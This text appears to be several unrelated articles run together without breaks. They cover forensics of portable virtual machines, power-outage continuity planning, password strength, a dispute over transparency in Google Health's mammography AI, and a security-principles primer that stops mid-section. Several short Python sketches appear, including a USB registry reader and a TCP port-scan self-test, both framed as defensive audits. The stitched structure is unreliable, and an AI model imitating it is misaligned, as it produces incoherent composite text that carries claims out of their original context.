Virtualisation software allows a complete operating system to run from within another. For example, a user might have a computer running Windows Vista, but by installing virtualisation software, they could run a copy of Windows XP from the desktop. This virtual operating system can then perform every action a ‘real’ operating system can, including browsing the internet, editing files and accessing the CD-ROM drive or other portable media.

Such functionality might seem useless to some, but for many users it has a number of applications. Because virtualisation software can be stored on portable media such as a USB storage device, it allows the user to effectively take an entire user environment with them wherever they go. Rather than just carrying files, they can access all of their preferences on any machine. Alternatively, the same user may wish to run a piece of software that only works on the XP version of Windows. By installing virtualisation software, they could do so without having to revert the whole machine to an older operating system.

Where it is suspected that a computer has been used in the commission of a crime, however, these same benefits can become barriers to a successful investigation. Upon arrest of a suspect, computer equipment is typically confiscated and passed to an expert for computer forensic analysis. Such experts aim to extract legally admissible evidence in the form of deleted files, registry entries and internet browsing histories. Where a virtual machine has been used, however, the browsing history and registry data are written to the virtual machine and not to the host computer. This means that if the portable storage device is removed, there will be little or no evidence of user activity on the host machine.

Most virtual machines require the user to install software on the host, so there may at least be registry evidence that the software itself was once present, but some can be run directly from a CD-ROM or USB storage device, in which case even less of a trace is left. For this reason, computer forensic analysts typically check the registry for signs that removable media has been connected. In some cases, computer forensic experts may be able to extract information about activity on a virtual machine by analysing the communications between the portable device and its driver, stored on the host machine.

The common use of portable media to store virtualisation software makes it all the more important that such devices are located and analysed in any computer forensic investigation. Yet even when the virtualisation software is located, a core problem for analysts arises where the user does not save the environment in its new state before exiting: records of activity are then discarded in a way that makes them impossible to recover.

At present, the use of virtualisation software in the home is relatively uncommon, and server-side monitoring of those accessing indecent images of children or other such illegal material is still effective in capturing perpetrators, even where virtualisation software is in use. Nevertheless, the recovery of computer-based evidence remains vital, so computer forensics is now moving into the virtual world, finding new ways to extract data from ever more elusive virtual machines.
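As an illustration of the kind of removable-media check described above, here is a minimal sketch using Python's standard winreg module to enumerate the USBSTOR registry key, where Windows records previously connected USB storage devices. The key path is standard, but subkey contents vary by Windows version; treat this as a starting point, not a forensic tool.

```python
# Sketch: enumerate previously connected USB storage devices from the
# Windows registry (USBSTOR), one common check for removable media.
# Assumes Windows and read permissions; run against a forensic image
# or with proper authorisation only.
import winreg

USBSTOR = r"SYSTEM\CurrentControlSet\Enum\USBSTOR"

def list_usb_storage_history():
    devices = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USBSTOR) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):     # number of subkeys
            device_class = winreg.EnumKey(root, i)        # e.g. Disk&Ven_...&Prod_...
            with winreg.OpenKey(root, device_class) as dev:
                for j in range(winreg.QueryInfoKey(dev)[0]):
                    serial = winreg.EnumKey(dev, j)       # per-device instance ID
                    devices.append((device_class, serial))
    return devices

if __name__ == "__main__":
    for device_class, serial in list_usb_storage_history():
        print(device_class, serial)
```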
Commercial electrical power can be lost due to downed lines, malfunctions at a sub-station, inclement weather, planned ‘rolling‘ blackouts, or in extreme cases a grid-wide failure. As a business continuity practitioner, I regularly explore whether businesses have implemented any ‘lessons learned’ from the Northeast power ‘Blackout’ of 2003. The answers vary from ‘yes we did’ to ‘why – it may never happen again’.

It has been 10 years since this event caught most off guard in its reach and magnitude. The Blackout was a wide-reaching power outage that occurred throughout parts of the northeastern and Midwestern United States and many eastern Canadian provinces (including Ontario) in the late afternoon of Thursday, August 14, 2003. While some power was restored within six hours, many businesses and residences were without power for upwards of 48 hours. The Blackout affected an estimated 10 million people in Ontario and 45 million people in the United States.

The Blackout’s primary cause was attributed to a software glitch in a control room of the FirstEnergy Corporation in Ohio: operators were unaware of the need to redistribute power after transmission lines were overloaded. The glitch had the potential to be a manageable operational procedure with minimal local power loss, but it turned into a widespread national event affecting many consumers (business and residential) in the northeastern and Midwestern United States and eastern Canada. Even as power was being restored, affected areas were asked to limit power usage until the grid was back to full capacity.

Critical infrastructure impacted at the time included the water supply (lost water pressure) and transportation (railroad service was stopped north of Philadelphia and in the New York City area, and Canada’s Via Rail service between Toronto and Montreal suffered schedule delays). Airports were closed. Many gas stations were unable to pump fuel due to lack of electricity. Many oil refineries on the east coast of the United States shut down and were slow to resume gasoline production.

The Blackout impacted communications well outside the immediate area of the outage. Cellular communication devices were disrupted. Landline telephones continued to work, although some systems were overwhelmed by the volume of traffic, and millions of home users had only cordless telephones dependent on house current.

It is well known through many studies that power failures and power surges are by far the most frequent (45%) cause of data loss in IT systems (Source: ContingencyPlanning). Fortunately, with proactive planning and implementation of cost-effective strategies, you can protect your business and mitigate the impacts of power disruption.

Getting Started – Protecting Your Computers, Servers and Data

Computing technology requires a constant and uninterrupted feed of stable and “clean” electrical power, which is power that does not ‘surge’ or ‘fail’ at any time. Taking a proactive approach to power loss planning – like designing a system that mitigates the impact to operations – and protecting your computers, servers and data from service interruptions is simple if you follow the steps below:

- Inventory all electronic equipment to be protected. This can be done by undertaking a business impact analysis (BIA), which will define which processes and underlying IT and other technology infrastructure must be preserved when power failures and surges occur.
  BIAs should also address all costs to your business when the power goes out, including quantifying the cost of lost operational data, lost sales (current or future revenue), and impacts to the ‘customer experience’ of those who rely on your products and service delivery for their business.
- Include the location and required wattage of each piece of equipment you want to connect to uninterruptible power.
- Include electrical outlets, plug type, circuit information, and amperage.
- Decide what level of power protection is required for each piece of equipment:
  - Does this equipment need power protection (i.e. surge protectors)?
  - Does this equipment need uninterrupted power? (If the equipment is critical to the operation of your business and needs several minutes to safely shut down, it should be connected to an uninterruptible power supply [UPS].)
  - How long do I want my equipment to be able to run in case of a blackout? (The total power demand [wattage] of the needed equipment during a blackout and the length of time you need your equipment to be operational will define whether a UPS or emergency power generation [EPG] equipment is needed.)
  - Do I need software that will automatically shut down my computer and save my files in the event of a blackout? (Many UPSes have software that will automatically sense a power outage and perform an orderly shutdown of a computer connected to it. It is strongly recommended to install automatic shutdown software for all network servers.)
- Develop appropriate mitigation strategies and implement power protection equipment.

There are three basic levels of power protection equipment commonly used today. Understanding the differences will help you decide which level is appropriate for protecting your business and equipment.

Level 1 Protection: The Surge Protector

The surge protector is a device that shields computers and other electronic devices from surges in electrical power, or transient voltage, which flow from the power source. The standard voltage for homes and office buildings is 120 volts. Anything over this amount is considered transient and can damage electronic devices that are plugged into an outlet. A surge protector works by channeling the extra voltage into the outlet’s grounding wire, preventing it from flowing through the electronic devices while at the same time allowing the normal voltage to continue along its path.

Level 2 Protection: The Uninterruptible Power Supply (UPS)

An uninterruptible power supply — also known as an uninterruptible power source, UPS, or battery backup — is an electrical apparatus that provides emergency power to a load when main (commercial) power is interrupted or fails. A UPS provides battery backup that aids in saving data by keeping computer systems running with no interruption in the event of a brownout, blackout, or overvoltage. UPSes also offer protection from surges, spikes, and sags.

Many UPSes are sized to allow the computers attached to them to run for 10-25 minutes. This is sufficient time for users to log off their computers, write unsaved data to disk, and perform an orderly shutdown of the operating system. For a small network server room, expect to pay between several hundred and a few thousand dollars for UPSes, and tens of thousands for larger server rooms. Advanced UPS systems with specialised software are able to ‘sense’ power disruptions and can issue shutdown commands to the operating system to safely shut down any computers connected to them, aiding in saving data.
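The sizing questions above reduce to simple arithmetic. Below is a rough Python sketch for estimating whether a UPS can carry a given equipment inventory long enough for an orderly shutdown. The inventory, battery capacity, and efficiency figure are all hypothetical assumptions; real runtime depends on battery age, temperature, and the UPS's efficiency curve at a given load.

```python
# Rough UPS runtime estimate: illustrative only. Real runtime varies with
# battery age, temperature, and inverter efficiency at the actual load.
def estimated_runtime_minutes(battery_wh, load_watts, efficiency=0.85):
    """battery_wh: rated battery capacity in watt-hours.
    load_watts: total wattage of connected equipment.
    efficiency: assumed inverter efficiency (hypothetical default)."""
    if load_watts <= 0:
        raise ValueError("load must be positive")
    return battery_wh * efficiency / load_watts * 60

# Hypothetical inventory from a BIA: (name, watts)
inventory = [("file server", 350), ("network switch", 60), ("monitor", 30)]
total_load = sum(watts for _, watts in inventory)

runtime = estimated_runtime_minutes(battery_wh=480, load_watts=total_load)
print(f"Total load: {total_load} W, estimated runtime: {runtime:.0f} min")
# If the result falls below the minutes needed for an orderly shutdown,
# size up the UPS or plan for generator (EPG) support.
```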
Level 3 Protection: Emergency Power Generation Equipment

A longer-term power supply strategy for when the UPS itself loses power is the emergency power generator (EPG). The EPG is usually powered by gasoline or diesel fuel and can provide power for extended periods. In a small installation, a portable generator is placed outside your business and extension cords are run from the generator to critical equipment and portable lights. For more complex environments, or permanent installations, the generator is permanently mounted and connected to the main power supply for the building. For most small businesses, the cost of emergency power generation equipment is prohibitive, costing several thousand dollars or more, so most choose to implement uninterruptible power supplies instead.

In modern buildings, most emergency power systems are still based on generators. Usually these generators are driven by a diesel engine, although smaller buildings may use a generator driven by a gasoline engine, and larger ones a gas turbine. It should be noted that most typical building emergency power systems supply emergency lighting to allow for safe exit during building evacuations and to illuminate service areas such as mechanical rooms and electric rooms. Exit signs, fire alarm systems and the electric motor pumps for the fire sprinklers are almost always run by emergency power. If you need emergency power from such generating equipment to ensure normal operations during power outages, then it must be designed, installed, and tested to ensure it meets your defined performance requirements. For example, hospitals use emergency power outlets to power life support systems and monitoring equipment.

If you forgo building the infrastructure required to address power surges and outages, you can instead move your applications and business systems to cloud computing to protect against IT data and performance losses. While cloud computing and data storage are accessible to companies of all sizes, the choices are endless; the question remains which one is right for your organization. You need to consider speed, security, scalability, recoverability, compliance and price.

In addition, business interruption insurance coverage is designed to help businesses that lose revenue due to unexpected shutdowns or limitations of operations. Generally, coverage is designed to protect a business’s income flow rather than its property. Business owners should familiarize themselves with the types of events that might force them to close and know whether these events arise from perils excluded from their property and business insurance coverage.

We can all learn from recent power outage events, and power outages are becoming more frequent. Having a plan of action to protect your business assets is one of the most cost-effective strategies available. Take the challenge and learn what to do before disaster strikes: you can’t predict an emergency, but you can prepare for one.
If you don’t want to fall victim to a cybersecurity incident, you need a strong password. “Breaches, as always, continue to be mostly due to external, financially motivated actors. And 61% of breaches involved credential data,” Verizon revealed in their 2021 Data Breach Investigations Report of nearly 30,000 cybersecurity incidents.

Having a strong password is a great first step in preventing a cybersecurity incident. While passwords aren’t the only protection an organization can put up against data breaches, they can mitigate the damage. Here’s how to audit your accounts for password strength, and what else you can do to protect your data.

First, be sure to include passwords in your security awareness program—educate your employees (and customers) about what a good password looks like, how often it should be changed, and why passwords matter. In your security awareness program, highlight examples of good passwords. Passphrases are often preferred to passwords because they’re harder to figure out. For example, you may consider converting a phrase to an acronym and using that as your password:

ApIw1,0o0W → A picture is worth a thousand words

Find a phrase that is unique to you. Compared to good passwords, bad passwords are commonly used and easy to guess. Combined, the top 10 worst passwords of 2020, according to NordPass, were exposed nearly 50 million times, and most took less than a second to crack. Bad passwords also include sensitive data such as birthdays, anniversaries, street addresses, and other information that is connected to the user.

Maintaining a strong, unique password or passphrase for each of your accounts is challenging. That’s why we recommend IT departments install and enforce the use of a password manager across their network. Password managers generate, store, and help you update passwords. Most password managers also offer users and IT departments real-time security checks to help you understand whether specific passwords have been potentially compromised in a cybersecurity incident. Plus, password managers help you track the age of a password; industry regulations may dictate or recommend that passwords change regularly, such as every 30, 60, or 90 days. That way, you know when an older password needs to be replaced.

Finally, we recommend—and some industries require—the use of multi-factor authentication (MFA) to help keep your sensitive information protected. MFA requires more than just a password to ensure the user logging in is the person who is supposed to be there. MFA combines distinct factor types, such as something you know (a password) and something you have (a phone or hardware token). Enabling MFA for your business means that no matter how clever the criminal, they will still be missing one or more factors, preventing access.

Overall, we recommend a thorough audit of your business’s passwords in order to either achieve compliance or to implement best practices for your organization. By educating your team about the importance of strong passwords and password management, your business maintains a much better defense against cybersecurity threats. Passwords and MFA are just two components of a comprehensive data security plan.
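As a rough illustration of what an automated strength check might look like, here is a small Python sketch that estimates password entropy from length and character variety. It is a toy heuristic with an assumed 60-bit threshold, not a substitute for a real password manager's audit.

```python
# Toy password-strength heuristic: estimates entropy in bits from the
# character classes used and the length. The 60-bit threshold is an
# illustrative assumption, not an industry standard.
import math
import string

def estimate_entropy_bits(password: str) -> float:
    pool = 0
    if any(c in string.ascii_lowercase for c in password):
        pool += 26
    if any(c in string.ascii_uppercase for c in password):
        pool += 26
    if any(c in string.digits for c in password):
        pool += 10
    if any(c in string.punctuation for c in password):
        pool += len(string.punctuation)   # 32 symbols
    return len(password) * math.log2(pool) if pool else 0.0

for pw in ["123456", "ApIw1,0o0W", "correct horse battery staple"]:
    bits = estimate_entropy_bits(pw)
    verdict = "strong" if bits >= 60 else "weak"
    print(f"{pw!r}: ~{bits:.0f} bits ({verdict})")
```

Note how the short numeric password scores under 20 bits while the passphrase scores well over 100, which is the intuition behind preferring passphrases.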
On the surface, an artificial intelligence (AI) that can detect breast cancer from a mammogram scan more successfully than a human radiologist seems like a game-changing use of technology. This is what Google Health proudly announced in January, publishing a paper in the journal Nature stating that its algorithm was more successful than six radiologists at identifying cancer from a large dataset of breast scans.

Screening for breast cancer is the first line of defence against the disease and, for many women, early diagnosis can literally be a matter of life or death. Interpreting the scans is a laborious and tricky task for radiologists, as the cancer is often hidden under thick breast tissue. So the idea that an AI could share or one day take over this workload is an alluring one, which caught the attention of the medical research community.

“When this Google AI paper got published I was very excited,” says Dr Benjamin Haibe-Kains, a senior scientist at Toronto’s Princess Margaret Cancer Centre, one of the world’s largest cancer research centres, and associate professor in the Medical Biophysics department of the University of Toronto. “I do a lot of analysis of radiological images and work with a lot of radiologists, and we all understand that the current way of doing things is super-tedious and we need to do better.”

The only problem was that when Dr Haibe-Kains went to look for the code and the model behind the algorithm, he could not find any details in the paper. This led him and 19 colleagues affiliated with leading institutions such as McGill University, the City University of New York (CUNY), Harvard and Stanford to publish a rebuttal in Nature this month. The group contends that the absence of information about how Google Health’s AI works “undermines its scientific value”, restricting the ability to carry out peer review or spot potential issues with its methodology.

The ensuing debate goes to the heart of an issue affecting many of the AI systems that are playing an increasingly important role for businesses around the world: how much AI transparency should we expect, and how do we ensure developers lift the lid on how their systems operate?

No code, no model, no transparency?

Dr Haibe-Kains and his colleagues were prompted to act because they felt the Google Health research did not meet the usual standards for a scientific research paper. “I read the Google AI paper, got very excited, read the method section and thought ‘okay, let’s do something with this’,” he says. “Then I looked for the code, there was none to be seen. I looked for the model, there was none to be seen. They are publishing in a scientific journal, so it is Google’s responsibility to share enough information so that the field can build upon their work.

“For us Nature is the holy grail, the best of the best, and if we want to publish in it we will be asked to share all our code, all our data and everything else. It seems that for Google that was not the case, which came as a surprise.

“As researchers we love this technology and want it to work, but with no way for us to test a model in our own institutions, we have no way to scrutinise the code and learn from it.”

He adds: “I’ve got into many heated discussions about this, and a lot of people will say it’s a great technology and we should trust the results. My response to them would be to ask how does this change the way you would treat patients? How does it help you in any way? It doesn’t, because without the code you can’t recreate it.
Even if you tried, using the information available, it would take at least six months and you still couldn’t be sure you had a result which was close to their model, because there’s no clear reference available.”

Software as a medical device

In response, the authors of Google’s initial paper say they have put enough information out there that “investigators proficient in deep learning should be able to learn from and expand upon our approach”. They add: “It is important to note that regulators commonly classify technologies such as the one proposed here as ‘medical device software’ or ‘software as a medical device’. Unfortunately, the release of any medical device without appropriate regulatory oversight could lead to its misuse.

“As such, doing so would overlook material ethical concerns. Because liability issues surrounding artificial intelligence in healthcare remain unresolved, providing unrestricted access to such technologies may place patients, providers, and developers at risk.”

Google Health adds that commercial and security considerations are also important. “In addition, the development of impactful medical technologies must remain a sustainable venture to promote a vibrant ecosystem that supports future innovation. Parallels to hardware medical devices and pharmaceuticals may be useful to consider in this regard. Finally, increasing evidence suggests that a model’s learned parameters may inadvertently expose properties of its training set to attack.”

Commercial concerns a barrier to transparency?

Tensions between academic and commercial interests are nothing new, of course. “[Google’s] view is it’s not just the algorithm,” says Wael Elrifai, VP for solution engineering at Hitachi Vantara, whose team designs and builds AI systems for customers around the world. “They trained this particular one on more than nine million images, which probably cost many millions of dollars in computer time alone, not to mention the feature engineering and the testing and all these different things. This was a multi-million dollar effort, and they’re going to want some of that money back.

“There will also be security concerns about people getting hold of this code and changing it, because it’s sometimes the case with deep learning that very small changes can make a big difference. On self-driving cars we’ve seen stories where you make changes of one or two pixels on a stop sign, a change which is invisible to a human being, and the algorithm interprets it as a 45mph sign instead. Elements of these AI systems are brittle.”

He continues: “In general, I’m with the academics on this one, because I’ve never heard of a scientific paper that doesn’t give you enough information to reproduce the results. That’s the fundamental idea behind any scientific paper and without that it’s just marketing.”

Does AI transparency keep customers happy?

Though companies such as Google may be reluctant to fully show their working, customer demand may drive them to be more open. Mohamed Elmasry has been working in AI and the development of commercial technologies for 16 years, and is now CEO of Tactful AI, a UK start-up which uses machine learning to augment the customer experience. Among other things, its system listens in on calls between businesses and their clients and automatically provides the call handler with information relating to what is being discussed.

He says: “In our conversations with customers, we’re starting to hear more interesting questions like ‘where are you going to get your data from?
How can you use data we already have? How long does it take to get the models to a state that I can use? What’s the cycle of improving the training?’

“All of these types of questions have started being asked in the last few months and we’ve never seen that before,” Elmasry explains. “People are becoming more educated, not only because the level of adoption of AI has increased, but also because of the huge digital transformation we see everywhere.”

Elmasry says Google’s approach may reflect attitudes in AI development that have prevailed since the technology started to gain momentum. “At the start of the age of AI, providers would talk about how we could help businesses and so on,” he says. “Back then it was a little difficult to explain to them the kind of transformation they needed to do at operational level in order to get the results we were actually quoting in our marketing materials and research.

“So I think most of the providers got into the habit of neglecting the technical information and focusing on what we had achieved instead.

“The problem with that is that when you get into the sales process with your customers, you face the challenge of helping them understand that AI is a very nice tool that can give them lots of good results, but equally they need to invest in changing how they operate, and spend time on data, training and labelling. You meet some big businesses and they expect that AI is just going to work straight out of the box without training it on their exact use case.

“Here maybe Google is just trying to say we have a really promising future and we are going to achieve this and this, but decided not to get into the details of how everything happens because they felt they were addressing customers more than the research community.”

Can AI be truly transparent?

Adam Leon Smith is CTO of AI consultancy Dragonfly and editor of an ISO/IEC technical report under development on bias in AI systems. He told Tech Monitor that it is difficult to make deep learning AI systems (also known as deep neural networks), such as the Google Health AI, truly transparent.

“There’s an aspect of transparency that’s more dynamic, often called explainability,” he says. “That is knowing why an AI did what it just did, which is an unsolved problem with many deep neural networks.”

Leon Smith says this means there are always opaque parts of such systems, and he does not expect a solution to appear any time soon. “The problem is that the internal feature space of a neural network is so different to how you would describe the business problem or the real-life problem it is addressing,” he adds. “It’s very, very esoteric.

“There are mechanisms that you can use to try and reverse engineer it and come up with statistical correlations and try and come up with a generalised relationship between certain inputs and outputs. I think the problem will ultimately be solvable, but it isn’t now.”

The future of AI transparency: standards and regulation?

In their paper, Dr Haibe-Kains and his colleagues call for greater independent scrutiny of models presented in research papers, particularly those pertaining to healthcare. They propose a mechanism through which independent investigators are given access to the data and can verify the model’s analysis, as has been used in other areas.

“Ultimately I think we should just be much more upfront and transparent about what a paper is about,” Dr Haibe-Kains says. “If the paper is about research, then there is no excuse [to not be transparent].
You have all those technologies that make it super-easy to share the code, the models and even the data to a certain extent.

“If you’re in industry, you have a great product, and you want to tell the world, including the scientific community, how great it is, then just be up-front about it. Then it’s not about research, it’s about evaluation of a technology, and you can say we are not going to disclose the full details because that’s not what is expected.”

Leon Smith believes greater standardisation is required to enable relevant parts of AI algorithms to be scrutinised by the companies investing in them as part of digital transformation projects. He says: “When I talk to C-suite people at companies who are selling AI products, they are bombarded with questions from clients who are trying to get their arms around this topic, and haven’t got a standard way to address it. So if they’re producing something where there’s a legal risk, such as under data protection legislation, they would benefit significantly from having one single checklist of things that they have to go through, so they know which data they have to provide to their clients.

“I think the good players in the industry are certainly interested in this sort of thing. If you look at how we do it in areas like cybersecurity, we have established frameworks, procedures and standards that you will insist companies in your supply chain comply with. And you have independent auditors that will attest that a company is meeting those standards. I think that’s realistically the only way to go in terms of enforcing things in AI.”

Elrifai is in favour of greater regulation around the development of AI algorithms so that increased transparency would become a requirement. “The bottom line is we all subsidise Google very heavily one way or another, so they do have certain responsibilities,” he says. “We wouldn’t accept it if an arms manufacturer was assembling nuclear weapons and one of them blew up every six months. I think they need some guard rails in the way they operate, and it’s not crazy to heavily regulate some industries.

“In the UK, you have to offer the lowest price you can when selling to the NHS because you have a public rule that says health is special and has to be considered separately from the rest of the market. I think in areas like AI it’s okay to tell companies, such as Google, that they cannot just go in and maximise income.”
Information Security is such a broad discipline that it’s easy to get lost in a single area and lose perspective. The discipline covers everything from how high to build the fence outside your business all the way to how to harden a Windows 2003 server. It’s important, however, to remember not to get caught up in the specifics. Each best practice is tied directly to a higher, more philosophical security concept, and those concepts are what I intend to discuss here.

Eric Cole’s Four Basic Security Principles

To start with, I’d like to cover Eric Cole’s four basic security principles. These four concepts should constantly be on the minds of all security professionals.

- Know Thy System

Perhaps the most important thing when trying to defend a system is knowing that system. It doesn’t matter if it’s a castle or a Linux server — if you don’t know the ins and outs of what you’re actually defending, you have little chance of being successful. A good example of this in the information security world is knowledge of exactly what software is running on your systems. What daemons are you running? What sort of exposure do they create? A good self-test for someone in a small to medium-sized environment would be to randomly select an IP from a list of your systems and see if you know the exact list of ports that are open on the machine. A good admin should be able to say, for example, “It’s a web server, so it’s only running 80, 443, and 22 for remote administration; that’s it” — and so on for every type of server in the environment. There shouldn’t be any surprises when seeing port scan results. What you don’t want to hear in this sort of test is, “Wow, what’s that port?” Having to ask that question is a sign that the administrator is not fully aware of everything running on the box in question, and that’s precisely the situation we need to avoid. A simple sketch of such a self-test follows.
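A hypothetical sketch of the self-test, using only Python's standard socket module. In practice an admin would more likely reach for a tool such as nmap, but the idea is the same: compare what is actually open against what you expect, and there should be no surprises. The host address and expected port set below are made-up assumptions.

```python
# Self-test sketch: compare open TCP ports on a host you own against what
# you *expect* to be open. Serial and slow by design; a real audit would
# use nmap and scan the full port range, with authorisation.
import socket

def open_ports(host, ports, timeout=0.5):
    found = set()
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.add(port)           # connection succeeded: port is open
        except OSError:
            pass                          # closed, filtered, or timed out
    return found

HOST = "192.0.2.10"                 # hypothetical web server of yours
EXPECTED = {22, 80, 443}            # "it's a web server, plus SSH; that's it"
CHECK = range(1, 1025)              # well-known ports

surprises = open_ports(HOST, CHECK) - EXPECTED
print("unexpected open ports:", sorted(surprises) or "none")
```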
- Least Privilege

The next über-important concept is that of least privilege. Least privilege simply says that people and things should only be able to do what they need to do their jobs, and nothing else. The reason I include “things” is that admins often configure automated tasks that need to be able to do certain things — backups, for example. What often happens is the admin will just put the user doing the backup into the domain admins group, even if they could get it to work another way. Why? Because it’s easier. Ultimately this is a principle that is designed to conflict directly with human nature, i.e. laziness. It’s always more difficult to grant granular access that allows only specific tasks than it is to give a higher echelon of access that includes what needs to be accomplished. This rule of least privilege simply reminds us not to give in to that temptation. Don’t give in. Take the time to make all access granular, and at the lowest level possible.

- Defense In Depth

Defense In Depth is perhaps the least understood concept of the four. Many think it’s simply stacking three firewalls instead of one, or using two antivirus programs rather than one. Technically this could apply, but it’s not the true nature of Defense In Depth. The true idea is that of stacking multiple types of protection between an attacker and an asset. And these layers don’t need to be products — they can be applications of other concepts themselves, such as least privilege.

Let’s take the example of an attacker on the Internet trying to compromise a web server in the DMZ. This could be relatively easy given a major vulnerability, but with an infrastructure built using Defense In Depth it can be significantly more difficult. The hardening of routers and firewalls, the inclusion of IPS/IDS, the hardening of the target host, the presence of host-based IPS on the host, anti-virus on the host, etc. — any of these steps can potentially stop an attack from being fully successful.

The idea is that we should think in reverse — rather than thinking about what needs to be put in place to stop an attack, think instead of everything that has to happen for it to be successful. Maybe the attack had to make it through the external router, the firewall, the switch, get to the host, execute, make a connection outbound to a host outside, download content, run that, and so on. What if any of those steps were unsuccessful? That’s the key to Defense In Depth — put barriers in as many points as possible. Lock down network ACLs. Lock down file permissions. Use network intrusion prevention, use intrusion detection, make it more difficult for hostile code to run on your systems, and make sure your daemons are running as the least privileged user.

The benefit is quite simple — you get more chances to stop an attack from becoming successful. It’s possible for someone to get all the way in, all the way to the box in question, and be stopped by the fact that the malicious code in question wouldn’t run on the host. But maybe when that code is fixed so that it would run, it’ll then be caught by an updated IPS or a more restrictive firewall ACL. The idea is to lock down everything you can at every level — file permissions, stack protection, ACLs, host IPS, limiting admin access, running as limited users — the list goes on and on. The underlying concept is simple: don’t rely on single solutions to defend your assets. Treat each element of your defense as if it were the only layer. When you take this approach you’re more likely to stop attacks before they achieve their goal.

- Prevention Is Ideal, But Detection Is A Must

The final concept is rather simple but extremely important. The idea is that while it’s best to stop an attack before it’s successful, it’s absolutely crucial that you at least know it happened. As an example, you may have protections in place that try to keep code from being executed on your system, but if code is executed and something is done, it’s critical that you are alerted to that fact and can take action quickly. The difference between knowing about a successful attack within 5 or 10 minutes and finding out about it weeks later is astronomical. Often, having the knowledge early enough can result in the attack not being successful at all: maybe the attacker gets on your box and adds a user account, but you get to the machine and take it offline before they are able to do anything with it. Regardless of the situation, detection is an absolute must, because there’s no guarantee that your prevention measures are going to be successful.

The CIA Triad

The CIA triad is a very important trio in information security. “CIA” stands for Confidentiality, Integrity, and Availability. These are the three elements that everyone in the industry is trying to protect. Let’s touch on each one briefly.

- Confidentiality: Protecting confidentiality deals with keeping things secret. This could be anything from a company’s intellectual property to a home user’s photo collection.
Anything that attacks one’s ability to keep private that which they want kept private is an attack against confidentiality.

- Integrity: Integrity deals with making sure things are not changed from their true form. Attacks against integrity are those that try to modify something that’s likely to be depended on later. Examples include changing prices in an ecommerce database, or changing someone’s pay rate on a spreadsheet.

- Availability: Availability is a highly critical piece of the CIA puzzle. As one may expect, attacks against availability are those that make it so that the victim cannot use the resource in question. The most famous example of this sort of attack is the denial of service attack. The idea here is that nothing is being stolen, and nothing is being modified. What the attacker is doing is keeping you from using whatever it is that’s being attacked. That could be a particular server or even a whole network in the case of bandwidth-based DoS attacks.

It’s a good practice to think of information security attacks and defenses in terms of the CIA triad. Consider some common techniques used by attackers — sniffing traffic, reformatting hard drives, and modifying system files. Sniffing traffic is an attack on confidentiality because it’s based on seeing that which is not supposed to be seen. An attacker who reformats a victim’s hard drive has attacked the availability of their system. Finally, someone modifying system files has compromised the integrity of that system. Thinking in these terms can go a long way toward helping you understand various offensive and defensive techniques.

Next I’d like to go over some extremely important industry terms. These can get a bit academic, but I’m going to do my best to boil them down to their basics.

A vulnerability is a weakness in a system. This one is pretty straightforward because vulnerabilities are commonly labeled as such in advisories and even in the media. Examples include the LSASS issue that let attackers take over systems. When you apply a security patch to a system, you’re doing so to address a vulnerability.

A threat is an event, natural or man-made, that can cause damage to your system. Threats include people trying to break into your network to steal information, fires, tornados, floods, social engineering, malicious employees, etc. Anything that can cause damage to your systems is basically a threat to those systems. Also remember that threat is usually rated as a probability, or a chance, of that threat coming to bear. An example would be the threat of exploit code being used against a particular vulnerability: if there is no known exploit code in the wild, the threat is fairly low, but the second working exploit code hits the major mailing lists, your threat (chance) rises significantly.

Risk is perhaps the most important of all these definitions, since the main mission of information security officers is to manage it. The simplest explanation I’ve heard is that risk is the chance of something bad happening. That’s a bit too simple, though, and I think the best way to look at these terms is with a couple of formulas:

Risk = Threat x Vulnerability

Multiplication is used here for a very specific reason — any time one of the two sides reaches zero, the result becomes zero. In other words, there will be no risk any time there is no threat or no vulnerability. As an example, if you are completely vulnerable to the xyz issue on your Linux server, but there is no way to exploit it in existence, then your risk from it is nil. Likewise, if there are tons of ways of exploiting the problem, but you already patched (and are therefore not vulnerable), you again have no risk whatsoever.

A more involved formula includes the impact, or cost, in the equation (literally):

Risk = Threat x Vulnerability x Cost

What this does is allow a decision maker to attach quantitative meaning to the problem. It’s not always an exact science, but if you know that someone stealing your business’s most precious intellectual property would cost you $4 billion, then that’s good information to have when considering whether or not to address the issue.

That last part is important. The entire purpose of assigning a value to risk is so that managers can make decisions about what to fix and what not to. If there is a risk associated with hosting certain data on a public FTP server, but that risk isn’t serious enough to offset the benefit, then it’s good business to go ahead and keep it out there. That’s the whole trick — information security managers have to know enough about the threats and vulnerabilities to be able to make sound business decisions about how to evolve the IT infrastructure. This is Risk Management, and it’s the entire business justification for information security.
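The multiplication becomes concrete with numbers. Here is a small sketch that scores threat and vulnerability on a 0-1 scale and attaches a cost; the scores and the dollar figure are hypothetical, since in practice both are rough estimates made by the security team, but the zeroing-out property falls straight out of the arithmetic.

```python
# Risk = Threat x Vulnerability x Cost, as described above.
# Scores and costs here are hypothetical illustrations, not measurements.
def risk(threat: float, vulnerability: float, cost: float) -> float:
    """threat and vulnerability in [0, 1]; cost in dollars."""
    return threat * vulnerability * cost

# Unpatched server, working exploit in the wild, valuable data:
print(risk(threat=0.9, vulnerability=1.0, cost=4_000_000_000))  # high risk

# Same threat and cost, but the hole is already patched:
print(risk(threat=0.9, vulnerability=0.0, cost=4_000_000_000))  # 0.0
```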
Policy — A policy is a high-level statement from management saying what is and is not allowed in the organization. A policy might say, for example, that you can’t read personal email at work, or that you can’t do online banking. A policy should be broad enough to encompass the entire organization and should have the endorsement of those in charge.

Standard — A standard dictates what will be used to carry out the policy. As an example, if the policy says all internal users will use a single, corporate email client, the standard may say that the client will be Outlook 2000.

Procedure — A procedure is a description of how exactly to go about doing a certain thing. It’s usually laid out in a series of steps, i.e. 1) Download the following package, 2) Install the package using Add/Remove Programs, 3) Restart the machine, etc. A good way to think of standards and procedures is to imagine standards as being what to do or use, and procedures as how to actually do it.

In this section I’d like to collect a series of important ideas I have about information security. Many of these aren’t rules, per se, and are clearly opinion. As such, you’re not likely to learn them in a class. Hopefully, though, a decent number of those in the field will agree with most of them.

The goal of Information Security is to make the organization’s primary mission successful

